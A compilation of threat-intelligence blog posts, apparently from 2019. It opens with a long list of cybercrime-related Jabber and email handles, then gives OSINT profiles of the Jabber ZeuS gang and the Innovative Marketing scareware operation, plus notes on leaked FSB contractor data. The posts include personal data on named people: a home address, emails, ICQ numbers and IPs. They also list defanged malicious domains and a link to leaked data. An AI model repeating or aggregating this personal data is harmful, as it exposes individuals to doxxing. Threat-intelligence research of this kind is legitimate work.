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trunorth818688@jabber.hot-chilli.net
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trustmark@exploit.im
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try.again@jabber.ccc.de
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ttoto@xmpp.jp

tucuenta@suchat.org

tudeal@jabber.ru

tuk@xmpp.jp
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tumber77@exploit.im
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tungsten@exploit.im

tuning71@exploit.im

tunnelings@digitalgangster.com

tunnels@dlab.im

tunnels@exploit.im
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tupac111@jabbim.com

tupakov@exploit.im

tupolev@ubuntu-jabber.net

turan@xmpp.jp
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turist@jabber.ccc.de
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tut@exploit.im

tuttovabene@riseup.net
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twoaces@mpro.la

twoacesgud@exploit.im
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ubcsell@exploit.im
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ubuntu@jabber.ru
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ucee23@xmpp.jp

uchiha@exploit.im
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udrestorer@jappix.com

uedk@exploit.im
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ufo123@xmpp.jp

ufo@sj.ms

ug.sales@jabber.ru
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ug@jabber.se
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undernet@default.rs
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uniccsu?@jabber.ru
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unity.exe@riseup.net
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unkowl@exploit.im
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up1@xmpp.jp

upc@jabb3r.org
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us1ex@xmpp.jp

usa@exploit.im

usa@frod.cc

usa@jabbim.cz
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usadrop@0nl1ne.at

usaline@xmpp.jp
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useb2016@qip.ru
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user1133@exploit.im

user322@jaber.ru

user4658@inbox.im

user876876@jabber.se
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user@domain.com

user@exploit.im

user@mpro.la

user@ninja.im
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usfire@exploit.im

usha@exploit.im

uski@exploit.im

uski@xmpp.jp

uslugiddos@exploit.im

usod@exploit.im

ussr.android@jabber.ru

utiputi@hot-chilli.net

ux6850@xmpp.jp

uyeweera@dfoofmail.com
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v.procards@prv.name

v.v.p@xmpp.jp
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v0kabets@xmpp.jp
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v12@cnw.su

v3273546@xmpp.jp
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v6ops@ietf.xmpp.org
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vakantno@xmpp.jp
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valek427@exploit.im

valentin@exploit.im

valerian@xmpp.jp

valgalaxy1@jabbim.com
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validol@exploit.im
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validto@cnw.su

validus@dlab.im

valit1@exploit.im

valpolish@exploit.im

valvalentino23@jabbim.cz
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vampiree@dukgo.com

vampiri@default.rs
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van@jabbim.com

vanda@vandathegod.com

vanesyan@exploit.im

vanhelsingbro@xmpp.jp

vanille@exploit.im

vano-96123@yandex.ru
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vasabig@jabber.ru
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vasia _hacker@prv.name

vasya@jabber.com

vasya@jabber.ru

vasyazm@jabber.in

vatzefak@exploit.im
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vaxx@darkness.su

vaxx@exploit.im

vazahaker@dukgo.com

vazmutopandexp@swissjabber.ch

vbiv _servis@jabbim.com

vbivala@exploit.im
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vbvcard@xmpp.jp

vbvman@sj.ms

vbvua@sj.ms
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vcacadd45@xmpp.jp

vcc@exploit.im

vdc@xjabber.pro

vds@exploit.im

vdv@jab.pm
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ved@exploit.im

vedroid@exploit.im

vedyanovsan@jabber.ru

veganismo@salas.suchat.org

veganismo@suchat.org

vegass77@jabber.ru

vegaz@jabber.ru

vegms@jabber.ccc.de

vel@dukgo.com

velcar@jabber.pro

veles77@xmpp.jp

velson@0nl1ne.at

velvetpp@exploit.im

vemdru@exploit.im

vendeta@climm.org

vendetta@0nl1ne.at

vendetta@xak.cc

vendetto@exploit.im
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veneno@xmpp.jp

vengord@jabber.ru
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venya@0nl1ne.at

vereni@xmpp.jp

verif@dlab.im
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verified.cm@xmpp.jp

verified.garant@xmpp.jp
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verik@xmpp.jp

veritas@creep.im
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versus.online@exploit.im
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vertushka@jabber.org
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vestman@xmpp.jp

veter@jabbim.com

vevzoroaster@xmpp.jp
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vgik@sj.ms

vgmtsr@prv.name

vhdl@0nl1ne.at

vhwts@acnepills.org

via.master@exploit.im

viagra@jabber.ccc.de
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vib@crypt.am

vib@exploit.im

vibrasher@default.rs
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viceroy@jabber.at
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counselor@jabber.cz

cox@p-h.im
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cr@xabber.de
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crd-moderator@exploit.im
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crim3@0nl1ne.at

crimezone@jabber.org
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crlolvd@mail.ru
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crowsnest@hushmail.me

cruz407@jabber.piratenpartei.de

cruzen@jabber.cz
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cry@jabber.ccc.de

crypt@doitquick.net

crypter2013@exploit.im

crypterclub@exploit.im

crypting@jabber.org

cryptservice2013@korovka.pro

cryptservice@boese-ban.de

cryptservice@cryptovpn.com
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cryptuuss@xmpp.jp
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cube@exploit.im
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d0xa@codingteam.net
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d3xt3r@exploit.im
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dadypurple@xmpp.jp
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damageaz@exploit.im
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danhell@jabber.se
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dark-code.r@jabba.biz

dark001@jabb3r.org

darkcat666@xmpp.pro

darkcat@crypt.am

darkcat@w0rm.ws

darkhorse666@xmpp.jp

darkice6660700@freexmpp.net

darklin2708@freexmpp.net

darkmaket@xmpp.jp
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darkmatter@exploit.im

darkness@jabbim.com

darkode@exploit.im

darkoed@0nl1ne.at
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darkrlord@jabber.org.uk
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darksea@darkdna.net
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daunoff@zloy.im

davidi@xmpp.jp

dayglos91@xmp.net
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dazlord@default.rs
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dcs@exploit.im

dd@exploit.im

dd@jabber.se

dda2003dda@jabber.ru
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ddos.test@exploit.im
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de2zz@jabber.se
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death-817@zloy.im
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dec@dlab.im

december@jabber.dk

dede25@jabber.ch

dedicated4856@linux.pl

dedvelosiped@swissjabber.ch

deepdotweb@jabbim.com

deepmaster@exploit.im
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dell@fysh.in
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delta@jabster.ru
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demperio@jabber.de
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demyanyuk1991@meta.ua
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deniss1979@inbox.ru

denlaar@care2.com

denni.devito@mail15.com

dennlod@jabber.ru

dennyocean@xmpp.ru
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denyo@exploit.im

denysscom76@jabber.se
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denzelw@jabbim.cz

deputat16@jabber.ru
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devbitox@sj.ms

devilsoul@brauchen.info

devilsoul@default.rs

dexter _momo@jabber.cz

dezzmond@exploit.im

dfrgyd@jabbim.com

dfsqdqsdq@jabber.dk

diablo08@jabster.pl

diablo08@xmpp.jp

diablo2@exploit.im

didi66000@xmpp.jp

didog@swissjabber.ch

dieman@xmppnet.de
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digitalexchange@jabber.org
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dikapper@yandex.ru

dikefave@jabber.org

dilibau@qip.ru

diller666@exploit.im

dimanslit@jabbim.cz

dimman31@jabber.ru

dimonguss@jabber.se

dinero@jabber.se

dingo@lsd-25.ru

divirgent@exploit.im

djezkde@jabber.fr

djhoangwar@blah.im

dji.death@exploit.im

djin777@darknet.im

djwadya@jabber.org

dkcc@jabber.dk

dkr78@jabbim.cz

dlavager@exploit.im
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dmx10@korovka.pro

dn44@jodo.im

do@jabber.no
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docxor@crypt.am

docxor@w0rm.ws
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dokerr11@exploit.im
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791

dokini@exploit.im

dokini@xmpp.jp
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dominos@exploit.im

don6387@freexmpp.net

donjuan@jabber.otr.im
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donpepe@jabber.cz

donricardo@jabber.ru

doo@exploit.im

doofy3j6i@swissjabber.de

doofyngnf@swissjabber.ch

doooh@exploit.im

dorianblack@jappix.com

dota@jabbim.cz

dourakbh@jabbim.cz

downlow@jabber.ru

dozed@rows.io

dpeguero@sangdatared.com

dr-strange@jappix.fr

dr.frank@zloy.im

dr.lektor@jabber.by

dr.tomb@adastra.re

dralka@xmpp.ru
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drillop@njs.netlab.cz

droid@xabber.de

droon@jabber.no

drop.corp24@xmpp.jp

drop.seeker@thesecure.biz

drop77777@limun.org

drop@swissjabber.ch
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droproject@xmpp.is
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dstar@default.rs

dsv-support@exploit.im

dudu@exploit.im

duh _seti@exploit.im

dukeline@rambler.ru
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dumpspw@xmpp.jp
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dw0rd@afera.li
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dymka@jabbim.com

dzhin@exploit.im

e-mail1@mailinator.com
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e17 _e17@mail.ru

eaglest0ne@exploit.im
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easy@zloy.im
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ebomb@xmpp.jp

ebu@swissjabber.ch

ecco@jabbim.pl

eclipso@exploit.im

eden@jabber.de

edenr4@bezeqint.net

efcc@exploit.im
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egor@jabber.fm

eguane@jabbim.cz
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elcomandante@sj.ms
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eleven@jabber.no

elfmordor@jabber.se
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elihu@mpro.la

elihu@ylodge.ru

elite@jabber.se

elvi@exploit.im

elzig@exploit.im
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emiss@jabbim.pl

emmett@xmpp.jp

emmyslim@exploi.im

empire _support@dlab.im

emporio1@jabber.org

enemi@exploit.im
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english-man@jabber.org

engo@swissjabber.ch

enigmatic@0nl1ne.at

enni100@exploit.im

enprivee@jabber.com

ensamblado@0nl1ne.at

enservice@0nl1ne.at

eojik22@jabbim.com

epoepo@exploit.im
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eps0n@creep.im

eric1@jabbim.com
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ernesto@jabme.de

err0r@0nl1ne.at

escobar78@jabber.ru

escobare13@xmpp.jp

escobear@is-a-furry.org

escrow7777@jabber.at

esipenko065@qip.ru

esizkur@jabber.ccc.de

esmurf@jabber.hot-chilli.net

ethanq1@jabbim.com

ethanq@xmpp.jp

etneyavnature@jabber.org

etozhetor@exploit.im

euromachine@jabbim.cz

europe@exploit.im

euroscrypt@xmpp.jp

eurotraff@thiessen.im

eusms-m@xmpp.jp

evasupport@jabber.org

eve@hackerhuntress.com

evil.code@jabber.mu

evil@sj.ms

evilgeniuss@exploit.im

evren@superbug.co

ex-kit@exploit.im

ex3ct@xmpp.jp

example@something.com

exchange@exploit.im

exchanger@xmpp.jp

exe@deshalbfrei.org

exgam1ng@mail.ru

exiex@exploit.im

exo@swissjabber.ch

exodus1337@exploit.im

exodusteam@jabber.se

exp@dlab.im

exp@swissjabber.ch

expact@jabme.de

expert234@list.ru

exploit.in@jabber.at

exploit.in@jabber.ru

exploitkit@jabb3r.org

exploitmaker@fuckav.in

expo@xmpp.jp

exsisto@swissjabber.ch

exsisto@zloy.im

ezchoice.lab@jabber.org

ezek13l@exploit.im

f0x@jabber.vc

f4k@exploit.im
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faceoff@jabbim.cz

faceoffcc@yandex.com

fakeit@darknet.im
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fakeit@exploit.im

fakeit@wwh.so

falcon38@jabber.se

falken00@jabber.se

falox@exploit.im

famcorp@jappix.com

fan1k@exploit.im

fantabot@exploit.im

fantomass@swissjabber.ch

fantonik@exploit.im

farnell@monopoly.cc

fars@exploit.im

fastchk@dlab.im

fasters@xmpp.jp

fastservice@thesecure.biz

fasttaxi@jabber.se

fater004@exploit.im

faussaireduweb@jabber.fr

favorit@swissjabber.ch

faysald@exploit.im

fazan4ik@swissjabber.ch

fechev@exploit.im
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fed88@exploit.im

fedumps.su1701@safetyjabber.com

feelinclub@photofile.ru

fenux@jabbim.com

fernando@exploit.im

feromon@neko.im

ferrnandes@jabber.org

fesfefsef@bk.ru

feshop-reserve.ru1112@linux.pl

fetum@jabber.ru

ffstat@jabber.org

fighthecan@blah.im

filterkj@jappix.com

finance@neko.im

finel@codingteam.net

finisher@jabber.se

fintzet5@mail.ru

fiopat@jabber.ru

fiopat@jabbim.ru

fiqhfsdsq@dsqhih.com

fireonix@exploit.im

firstofall@swissjabber.ch
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fl0yd@exploit.im

flaminco971@jabb.im

fldr@jabber.net

flexo@jabb3r.net

flexo@jabber.se

flexyag@live.fr

flm2@exploit.im

flnsh@jabber.cz

fludoff@jabberon.ru

fluxxy@exploit.im

fly009@jabbim.com

fly999@jabbim.pl

flynn@default.rs

flynnie@xmpp.jp

fobiya-dserv@jabber.ru

foma9999@jabber.sk

fomabss@xmpp.org.ru

fomawso@jabber.cz

forchuma@xmpp.jp

forcryptgroup@exploit.im

forgood@0nl1ne.at

forhaters@jabber.org.uk

forrest2042@xmppcomm.com

fortex@xmpp.jp

fortiix@swissjabber.ch

fortuna@jabber.se

forum@100500.cc

forum@w0rm.ws

foufoufn@jabber.ua

fouzya@jabber.de

fox@jabb.im

foxdesierto@exploit.im

foxfinder@exploit.im

foxfox7@xmpp.jp

fr0st@blackhat.cc

frame@pandion.im

frances1411@freexmpp.net

francyz1111@exploit.im

franklin5222@jabber.dol.ru

frederic@xmpp.jp

fredholmes@kdex.de

free _eagle@exploit.im
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freemason@exploit.im

freeone@jabbim.com

freko83@jabber.dk
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freshtea93@jabber.lqdn.fr

frever@exploit.im
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friendfox@exploit.im

frkn@0nl1ne.at

frosty@cih.ms

fsfsdf@jappix.com
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fucker@jabber.com

fuckeurusd@exploit.im

fud@sj.ms

fullspeed@xmpp.ru

funlab@jabster.pl

funn3y@crypt.mn

funnyman@exploit.im

funnymilk@neko.im

fur@jabber.no

furorem@exploit.im

fux@xmpp.jp

fvxc24u4cevy@mail.lilianurquieta.com

g00fy@exploit.im

g0dlike@jabber.org

g4lyfe@sj.ms

gambling@exploit.im

gameazazello@exploit.im

gamoonty@xmpp.jp

ganar@swissjabber.ch

ganjakillerganja@jppix.com

garage _cryptors@xabber.de

garagefm@jabbim.cz

garantbro@jabbmin.cz

garantbro@mail.com

garrickbest@chatme.im

gatacca@jappix.com

gazastyle@xmpp.jp

gazgaz@mail2tor.com

gedeon12@exploit.im

geety@jabber.cz

geforse2@jabber.org

geforse@exploit.im

gekkon-han@exploit.im
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generatorr@exploit.im

geneziz@exploit.im

geniusz0992@codingteam.net

gent _78o6j@swissjabber.org

gent _7mz8l@swissjabber.ch

gent _8dt2x@swissjabber.org
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georgui-nestrugai@exploit.im

geoxi@jabber.de
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geron@exploit.im

getjab@zloy.im

getroken@exploit.im

gezileaks@tormail.org

gg@jabb.im

gh0stfromb4y@dukgo.com

ghost756@xmpp.jp

ghost@darklife.ws

ghost@exploit.im

ghostron@xmpp.jp

ghostsoul85@climm.org

giako@2d.com

gidroperit@jabber.se

gigabiteshow@exploit.im

gillesgilles@jabbim.cz

gillette@macjabber.com

git@bitbucket.org

git@pupita.labs.dot.net

gizzz-service@mail.ru

glassmal@jabber.org

glfx@jabberim.de

glk@exploit.im

globape135@jabber.cz

gmiller@exploit.im

gmp@jabbim.cz

gnom@jabbim.com

go@xmpp.jp

goaut@xjabber.org

god@draugr.de

godofroot@jabber.org

gogol@darkjabber.cc

goldbizman@inbox.ru

goldman.f@orange.fr

goldspider@jabbim.cz

goldspider@neko.im

goodfood@exploit.im

goodguy@xmpp.jp

google.com@default.rs

gorila@dione.zcu.cz

gostznak@jabber.ru

gov@xabber.de

gp@exploit.im
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gradur@jabber.dk

grafikul@exploit.im
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graver@exploit.im

graycat@exploit.im
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greatmind@darkmasters-team.pw

greed1sg00d@rows.io

greed@jaber.su

green191@exploit.im

green777@xmpp.jp

greenzy@exploit.im

greenzy@jabber.org

grenaderben@jabber.cz

gresso@exploit.im

grey@lsd-25.ru

greyjob@zloy.im

gross@talks.name

grostalker@jabbim.cz

grostalker@swissjabber.ch

gtravels@jabber.ru

gucci@jappix.com

guerria13@xmp.net

guido@unknownsite.de
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gupta@exploit.im

guwop@jabber.ru

h0bb1t@codingteam.net

h0tsh0t@jodo.im
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h4ckntw1@jabber.de

h4ckntw@jabber.de
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hand _of _thief.sale@im.apinc.org
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hartwel@exploit.im
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haxxor@jabber.de

headman@adastra.re

heinz7@xmpp.jp
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hello@shirobonmusic.com

hello@thejekyllandhyde.co.uk
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hellow0rld@exploit.im

helloworld@chatme.im
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hen@darkdna.net
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hhu@gmx.fr

hidden@mail.ru

hiho.kenzo@xmpp.jp

him-prom-ekb@exploit.im
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hisoka@jabbim.com

hiuji@xmpp.ru

hkjhh@jabber.fr

hmon@swissjabber.ch

hompaga@exploit.im

hon3y@wjabber.net
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host007@jabber.dk
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igiaje@xmpp.jp

igorek _ua@jabber.ru
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ilnes@jabbim.com
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incognito@swissjabber.eu
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injector@jappix.com
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inquisitor@thesecure.biz

insaider@xmpp.jp

insane@swissjabber.ch

inside@jabber.no
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insidepro@exploit.im
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ipwn@cih.ms
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isnowy@jabber.org
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jab9r@otr.chat
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sheldon@creep.im

shenron@evil.im

sherazali@royallepage.ca

shm00p@lowermyjews.org

shockanon@protonmail.com

shodan@darkness.su

shows@badazzmusic.com

sicario@creep.im

sifying@swissjabber.ch

sinful@darkness.su

skyberry86business@aol.com

slacka@nigge.rs

snipersnague@xmpp.jp

social@ironbuttz.com.au

sohcra@riseup.net

soulmech@creep.im

soulmech@cryptostorm.is

spencer.ackerman@thedailybeast.com

spencerackerman@protonmail.com
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spite@riseup.net

spoof@thug.org

stackoverflowin@tuta.io

stank@blah.im

steve@cnbc.com

strive@null.pm

stunned@xabber.de

sudosev@protonmail.ch

superspooki@exploit.im

support@lookout.com

support@ohrange.co

support@spinrilla.com

syncing@darkness.su

syriancyberarmy@xtcmail.com

tanzer@darerising.gg

teamp0ison@riseup.net

technology@huffingtonpost.com

teepa@xmpp.jp

teepee@csa.gg

tehlulzywolf@jabber.otr.im

telnet@lsd-25.ru

teri@jabber.se

test123@0nl1ne.cc

theoriginalyurei@xmpp.zone

theralph@theralphretort.com

tim@tagg.ly

tips@popsci.com

tips@techcrunch.com

tmu@thug.org

tommyb@creativesoulsmediagroup.com

tongue@rickyberwick.com

topol@tormail.org

twitter@gusclass.com

uchiha@thug.org

ug@fbi.gov

ug@jabber.se

uglegion300@jabber.se

unity.exe@riseup.net

v0ld4m0rt@protonmail.com

v8@evil.im

v8@exploit.im

vanda@vandathegod.com

vc@cock.li

vc@xmpp.is

vegard@ufa.no

vicious@riseup.net

vickie@whitemanagement.co.uk

videosawesome@mail.com

vil@nigge.rs

vill@xmpp.jp
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violentexploit@xor.li

vito@relyy.com

voidsta@riseup.net

volatile@digitalgangster.com

voxi@evil.im

warfare@live.com

waters@lucky7.gg

will@wstraf.me

william@theoutline.com

windanon@riseup.net

wtf@protonmail.ch

x64bit@exploit.im

xeaned@swissjabber.ch

xev@xmpp.jp

yurei@yax.im

z@exiled.si

z@goat.si

zen@exploit.im

zihmp@cocaine.ninja

zmb@jabber.se

zora@jabb3r.de

zyqnlc@jappix.io

We’ll post new updates and will update this list as soon as new developments take place.

1. https://ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards_31.html

2. https://otr.cypherpunks.ca/

3. https://electrospaces.blogspot.com/2017/06/dutch-russian-cyber-crime-case-reveals.html

4. https://en.wikipedia.org/wiki/Lawful_interception
Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An OSINT Analysis (2019-07-29 17:18)

Continuing the "[1]FBI Most Wanted Cybercriminals" series, I’ve decided to take a closer look at the "Jabber ZeuS" gang, including [2]Evgeniy Mikhaylovich Bogachev, for the purpose of providing actionable intelligence on the fraudulent and malicious infrastructure that was utilized in the campaign, including personally identifiable information on the individuals behind it, with the idea of assisting law enforcement and the U.S. Intelligence Community with the necessary data to track down and prosecute the individuals behind the campaign.

In this post I’ll provide actionable intelligence on the infrastructure used by the "Jabber ZeuS" gang, including personally identifiable information for Evgeniy Mikhaylovich Bogachev and some of his known associates.

Sample Personal Photos of Evgeniy Mikhaylovich Bogachev:
Slavik’s IM and personal email including responding IP:

bashorg@talking.cc - 112.175.50.220

Personal Address:

Lermontova Str. Anapa, Russian Federation

Instant Messaging account:

lucky12345@jabber.cz

Related name servers:

ns.humboldtec.cz - 88.86.102.49

ns2.humboldtec.cz - 188.165.248.173

Related domains part of a C&C phone-back location:

hxxp://slaviki-res1.com

hxxp://slavik1.com - 91.213.72.115

hxxp://slavik2.com

hxxp://slavik3.com

Slavik’s primary email:

luckycats2008@yahoo.com

Slavik’s ICQ numbers:

ICQ - 42729771

ICQ - 312456

Related emails known to have participated in the campaign:

alexgarbar-chuck@yahoo.com

bollinger.evgeniy@yandex.ru

charajiang16@gmail.com

Related domains known to have participated in the campaign:

hxxp://visitcoastweekend.com - 103.224.182.253; 70.32.1.32; 192.184.12.62; 141.8.224.93; 69.43.160.163

hxxp://incomeet.com - 192.186.226.71; 66.199.248.195

hxxp://work.businessclub.so

Related information on his colleague (chingiz) as seen in the attached screenshot:

Real Name: Galdziev Chingiz

Related domains known to have participated in the campaign:

hxxp://fizot.org

hxxp://fizot.com - 50.63.202.35; 184.168.221.33

hxxp://poymi.ru - 109.206.190.54

Related name servers known to have participated in the campaign:

ns1.fizot.com - 35.186.238.101

ns2.fizot.com

Related domain including an associated email using the same name server:

hxxp://averfame.org - harold@avereanoia.org

Google Analytics ID: UA-3816538

Related domains known to have participated in the campaign:

hxxp://awmproxy.com

hxxp://pornxplayer.com

Related emails known to have participated in the campaign:

fizot@mail.ru

xtexgroup@gmail.com

xtexcounter@bk.ru

Related domains known to have responded to the same malicious and fraudulent IP - 178.162.188.28:

Related domains known to have participated in the campaign:

hxxp://fizot.livejournal.com/

hxxp://russiaru.net/fizot/

Instant Messaging Account:

ICQ - 795781

Related personally identifiable information of Galdziev Chingiz:

hxxp://phpnow.ru

ICQ - 434929

Email: info@phpnow.ru

Related domains known to have participated in the campaign:

hxxp://filmv.net

hxxp://finance-customer.com

hxxp://firelinesecrets.com

hxxp://fllmphpxpwqeyhj.net

hxxp://flsunstate333.com

Related individuals known to have participated in the campaign:

Slavik, Monstr, IOO, Nu11, nvidiag, zebra7753, lexa_Mef, gss, iceIX, Harderman, Gribodemon, Aqua, aquaSecond, it, percent, cp01, hct, xman, Pepsi, miami, miamibc, petr0vich, Mr. ICQ, Tank, tankist, Kusunagi, Noname, Lucky, Bashorg, Indep, Mask, Enx, Benny, Bentley, Denis Lubimov, MaDaGaSka, Vkontake, rfcid, parik, reronic, Daniel, bx1, Daniel Hamza, Danielbx1, jah, Jonni, jtk, Veggi Roma, D frank, duo, Admin2010, h4x0rdz, Donsft, mary.J555, susanneon, kainehabe, virus_e_2003, spaishp, sere.bro, muddem, mechan1zm, vlad.dimitrov, jheto2002, sector.exploits

Related Instant Messaging accounts and emails known to have participated in the campaign:

We’ll post new updates as soon as new developments take place.

Related posts:

[3]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis

[4]Who’s Behind the Syrian Electronic Army? - An OSINT Analysis

1. https://ddanchev.blogspot.com/2019/07/whos-behind-syrian-electronic-army.html

2. https://www.fbi.gov/wanted/cyber/evgeniy-mikhailovich-bogachev

3. https://ddanchev.blogspot.com/2019/01/exposing-irans-most-wanted.html

4. https://ddanchev.blogspot.com/2019/07/whos-behind-syrian-electronic-army.html

Profiling "Innovative Marketing" - The Flagship Malvertising and Scareware Distributor - Circa 2008 - An OSINT Analysis (2019-07-30 14:50)

Continuing the "[1]FBI Most Wanted Cybercriminals" series, I’ve decided to take a closer look at "[2]Innovative Marketing", the primary malvertising and scareware distributor participating in several high-profile malvertising and scareware-serving campaigns circa 2008, including personally identifiable information on two of the main group operators, [3]Shaileshkumar P. Jain and [4]Bjorn Daniel Sundin, with the idea to provide law enforcement and the U.S. Intelligence Community with the necessary information to track down and prosecute the gang behind these campaigns.

In this post I’ll profile actionable intelligence on the infrastructure behind the "Innovative Marketing" malvertising and scareware distributor circa 2008, including personally identifiable information on two of the key members of the gang.

Known "Innovative Marketing" alternative brand names and related associates:

Billingnow

BillPlanet PTE Ltd.

Globedat

Innovative Marketing Ukraine

Revenue Response

Sunwell

Synergy Software BV

Winpayment

Consultancy SPC

Winsecure Solutions

Winsolutions FZ-LLC

ByteHosting Internet Services, LLC

Setupahost.net

Known related campaigns and related brands launched by the same group:

BurnAds

UniqAds

Infyte

NetMediaGroup

ForceUp

Related malicious and fraudulent domains known to have participated in the campaign:

Related scareware products known to have been sold and distributed by "Innovative Marketing":

SpyGuarder

SpyKiller Pro

Spyware Sweeper

SpywareIsolator

SwiftCleaner

SystemDoctor

SystemErrorFixer

SystemSweeper

TotalAntivirus

Trasheraser

Trustedprotecion

UltimateCleaner

VirusRemover 2008

WinAntiSpyware

WinAntiVirusPro

WinBugFixer

WinDefender2008

WinFixer

Winsecureav

WinSpyware Protect

WinxDefender

XLifeGuarder

XP AntiSpyware 2009

XP AntiVirus

Related domains known to have participated in the campaign:

hxxp://adtraff.com – 190.15.73.254

hxxp://forceup.com – 190.15.73.254

hxxp://burnads.com – 190.15.73.254

hxxp://blessedads.com – 190.15.73.254

hxxp://prevedmarketing.com – 190.15.73.254

hxxp://r2d2adverising.com – 190.15.73.254

hxxp://shivanetworking.com – 190.15.73.254

We’ll post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2019/07/exposing-evgeniy-mikhaylovich-bogachev.html

2. https://ddanchev.blogspot.com/2008/02/malicious-advertising-malvertising.html

3. https://www.fbi.gov/wanted/cyber/shaileshkumar-p.-jain

4. https://www.fbi.gov/wanted/cyber/bjorn-daniel-sundin

Assessing the Recently Leaked FSB Contractor Data - A Peek Inside Russia’s Understanding of Social Network Analysis and Tailored Access Operations (2019-08-02 15:20)

I’ve recently managed to obtain a copy of the recently leaked FSB contractor data, courtesy of 0v1ru$ and "Digital Revolution", and I’ve decided to take a closer look, including an in-depth overview and discussion of the leaked data in the context of today’s modern-driven AI-powered automated OSINT technologies, in the broader context of the U.S. Intelligence Community, in particular the utilization of rogue TOR exit nodes for the purpose of intercepting and harvesting TOR exit node data within the Russian Federation, including social-network analysis data-mining and possible "lawful surveillance" and "lawful interception", including possible data collection type of Tailored Access Operation campaigns launched by "0day Technologies" and "SyTech".

Sample Company Logo:

Sample Company Logo:

Sample personal photos of the individuals behind "0day Technologies" and "SyTech":

Sample Screenshots of the User-Interface behind the "Lawful Surveillance" and "Lawful Interception":

Sample Screenshots of the Rogue and Bogus Tor-Exit-Node Research Project:

Sample URLs involved in the campaign:

hxxp://0day.ru

hxxp://sytech.ru

Sample Telegram account involved in the campaign:

hxxp://t.me/D1G1R3V_DigitalRevolution

Sample VKontakte account involved in the campaign:

hxxp://vk.com/d1g1r3v

Sample Twitter account involved in the campaign:

hxxp://twitter.com/d1g1r3v

hxxp://twitter.com/0v1ruS

Sample URL known to have participated in the campaign:

hxxp://d1g1r3v.net

Related URL of the currently leaked data:

https://mega.nz/ #F!3c0lTaLI!jVUS _O7Q0opCHUPYgK1E _w
g0t Bitcoin? (2019-08-19 12:51)

Dear blog readers, dare to take a moment of your precious time to check a venerable and recently proposed cyber security project investment including the opportunity to enter a Bold New World of Hacking and Information Security? Has the time come to set them straight? Keep reading.

Check out this Onion - http://lkzihepprlhxtvbutjedoazbsqd4avmif hpjms3zuq7itceiu4qajwad.onion/ and donate today!

Stay tuned!
DDanchev is for Hire! (2019-09-07 14:38)

Looking for a full time threat intelligence analyst, cybercrime researcher, or a security blogger?

Approach me at dancho.danchev@hush.com
Historical OSINT - The Russian Business Network Says "Hi" (2019-09-09 15:27)

You know you’re popular when "they" say "hi".

It’s 2009 and I’ve received a surprising personal email courtesy of guess who - The Russian Business Network showing off the actual ownership of the hxxp://rbnnetwork.com domain and basically saying "hi". It’s worth pointing out that throughout 2008-2013 I’ve extensively profiled the activities including the customer activities of some of the most prolific customers and members of the infamous Russian Business Network also known as the RBN in the context of [1]blackhat SEO, [2]iFrame and [3]input validation abuse across major [4]Web properties including [5]malvertising and various other [6]malware-serving and [7]client-side exploits serving campaigns including [8]money mule recruitment and [9]phishing campaigns and the ubiquitous at the time [10]fake security software also known as scareware in a variety of post series.

• Related post - [11]Dissecting a Sample Russian Business Network (RBN) Contract/Agreement Through the Prism of RBN’s AbdAllah Franchise

It’s been a decade since I last profiled the most prolific and sophisticated market-leading bullet-proof hosting cybercrime enterprise - the Russian Business Network which at the time was dominating the majority of campaigns that I was busy profiling with the help of fellow researchers to whom I owe a great deal of thanks for approaching me circa 2008-2013 namely [12]Jart Armin and [13]James McQuaid with whom I’ve been directly or indirectly keeping in touch throughout 2008-2013 for the purpose of offering quality research on the activities of the Russian Business Network including their customers and fraudulent and malicious campaigns.

• Related post - [14]Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against Multiple International Embassies

Stay tuned and thanks for reaching out!

Related Russian Business Network (RBN) Research:

[15]I See Alive IFRAMEs Everywhere - Part Two

[16]I See Alive IFRAMEs Everywhere

[17]Bank of India Serving Malware

[18]U.S Consulate in St.Petersburg Serving Malware

[19]Syrian Embassy in London Serving Malware

[20]CISRT Serving Malware

[21]Compromised Sites Serving Malware and Spam

[22]U.S Consulate St. Petersburg Serving Malware

[23]Massive RealPlayer Exploit Embedded Attack

[24]Malware Serving Exploits Embedded Sites as Usual

[25]MDAC ActiveX Code Execution Exploit Still in the Wild

[26]Yet Another Massive Embedded Malware Attack

[27]Embedding Malicious IFRAMEs Through Stolen FTP Accounts

[28]Over 100 Malwares Hosted on a Single RBN IP

[29]Detecting and Blocking the Russian Business Network

[30]Exposing the Russian Business Network

[31]Go to Sleep, Go to Sleep my Little RBN

[32]Injecting IFRAMEs by Abusing Input Validation

[33]RBN’s Fake Account Suspended Notices

[34]ZDNet Asia and TorrentReactor IFRAME-ed

[35]Russia’s FSB vs Cybercrime

[36]HACKED BY THE RBN!

[37]Rogue RBN Software Pushed Through Blackhat SEO

[38]Wired.com and History.com Getting RBN-ed

[39]The Russian Business Network

[40]Exposing the Russian Business Network

[41]More CNET Sites Under IFRAME Attack

[42]Embedded Malware at Bloggies Awards Site

[43]Have Your Malware In a Timely Fashion

[44]Geolocating Malicious ISPs

[45]More High Profile Sites IFRAME Injected

[46]The New Media Malware Gang - Part Four

[47]Another Massive Embedded Malware Attack

1. https://ddanchev.blogspot.com/search/label/Blackhat%20SEO

2. https://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

3. https://ddanchev.blogspot.com/2008/03/injecting-iframes-by-abusing-input.html

4. https://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html

5. https://ddanchev.blogspot.com/search/label/Malvertising

6. https://ddanchev.blogspot.com/search/label/Online%20Fraud

7. https://ddanchev.blogspot.com/search/label/Client-Side%20Exploits

8. https://ddanchev.blogspot.com/search/label/Money%20Mule
9. https://ddanchev.blogspot.com/search/label/Phishing%20Campaign

10. https://ddanchev.blogspot.com/2011/02/a-diverse-portfolio-of-fake-security.html

11. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html

12. http://rbnexploit.blogspot.com/

13. https://securehomenetwork.blogspot.com/

14. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

15. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

16. https://ddanchev.blogspot.com/2007/11/i-see-alive-iframes-everywhere.html

17. http://ddanchev.blogspot.com/2007/08/bank-of-india-serving-malware.html

18. http://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

